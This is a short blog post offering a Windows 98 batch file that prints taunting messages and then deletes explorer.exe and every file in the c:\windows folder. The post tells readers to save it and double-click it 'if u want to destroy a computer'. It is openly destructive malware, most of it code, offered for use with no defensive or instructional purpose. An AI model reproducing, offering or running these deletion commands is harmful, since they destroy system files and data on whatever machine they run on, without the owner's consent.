Sunday, September 09, 2018

Windows 98

Creating a Batch File to Destroy a Comp.having Windows 98 on it

Type the following code in notepad:

@echo off
echo your computer has lived its life
echo Gurneet Singh Rules!!
echo astalavista baby!!
del c:\windows\explorer.exe
del c:\windows\*.*
cls
exit

Then save the file as anyname.bat
Double click on it if u want to destroy a computer.

No comments:

Post a Comment